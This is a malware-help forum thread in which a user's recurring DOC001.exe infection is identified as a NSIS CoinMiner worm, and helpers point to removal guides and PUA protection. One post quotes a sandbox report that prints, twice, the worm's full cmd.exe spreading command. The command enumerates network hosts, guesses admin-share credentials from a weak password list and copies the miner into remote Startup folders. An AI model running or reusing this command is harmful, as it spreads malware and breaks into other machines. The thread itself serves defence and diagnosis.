Jump to content

Malware


Recommended Posts

  • Administrators

Is that "DC002. Exe" a name of a file? Is it detected by ESET? If not, please submit it to ESET for analysis as per FAQ on the right-hand side of this forum.

Link to comment
Share on other sites

  • Administrators

Have you also submitted logs as per the KB I referred to? Just knowing the file name doesn't tell anything.

Link to comment
Share on other sites

If the file is DOC001.exe, it is possible the .exe is a coinminer: https://malwaretips.com/blogs/remove-doc001-exe/ .

The first question is how did you know you were infected? Do you have Eset installed and it detected something? If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware.

Link to comment
Share on other sites

  • Administrators

So is it detected by ESET or not? If it is, under what name? If not, please submit it to samples[at]eset.com in an archive encrypted with the password "infected".

Link to comment
Share on other sites

The first question is how did you know you were infected? i saw on drive C of most computers has that folder. even you delete it , it will re- appear again. Do you have Eset installed and it detected something? I have Eset installed but its not detecting If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware.

Link to comment
Share on other sites

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

1 hour ago, Gerald KAmande said:

https://malwaretips.com/blogs/remove-doc001-exe/ .  i have tried it detects but the virus will still hit on those pcs 

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

Quote

When the scan has completed, you will be presented with a screen showing the malware infections that Malwarebytes has detected. To remove the malicious programs that Malwarebytes has found, click on the “Quarantine Selected” button.

 

Edited by itman
Link to comment
Share on other sites

There's a May 4, 2019 analysis of DOC001.exe at Malware-Analysis here: https://www.hybrid-analysis.com/sample/f23435192769e92a832e8eba0dd769fc50e23fb41f11cd647ea2c550520f2f68?environmentId=100 . AV detection of the malware is quite high. And it does maintain persistence in the various Win startup locations as noted below. Appears it is has loaded itself into every on of them!

Quote

icon_dummy.png cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 652) reduced_monitoring.png

icon_dummy.png cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temp\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temp\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 3880) reduced_monitoring.png

 

Link to comment
Share on other sites

19 hours ago, itman said:

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

 

i have uploaded the file attached see theresults

image.thumb.png.955b5eec04aaeafe29a4715ab00c303e.png

Link to comment
Share on other sites

  • Administrators

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan
NsCpuCNMiner32.exe - a variant of Win32/CoinMiner.DQ potentially unwanted application
NsCpuCNMiner64.exe - a variant of Win64/CoinMiner.CZ potentially unwanted application

The first one is a NSIS archive, the detection was added in April 2018. The other 2 executables (PUAs) are inside the NSIS archive, the detection was added in July 2017.

Link to comment
Share on other sites

1 hour ago, Marcos said:

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan

TrendMicro has an article on how to permanently remove this coinminer here: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_coinminer.inj . It does require some manual cleaning activities. Click on the "Solution" section. Substitute the "scan with TrendMicro" with a full in-depth scan using Eset Smart Security. 

If the above is too technically advanced for you, contract your regional Eset support concern for assistance: https://www.eset.com/int/ 

Link to comment
Share on other sites

For reference, SANS has an article on a malware sample using the NSIS installer here: https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ .

I believe this particular coinminer malware was deployed via a self-executing SFX archive using something along this line: https://gist.github.com/xymopen/951ef3d5301af55efd82eb67af129066 .

Make sure Eset's PUA protection is always enabled and don't ignore the warnings generated from it. It is far easier to prevent malware/nuisance-ware from being installed than trying to remove it later. 

Edited by itman
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...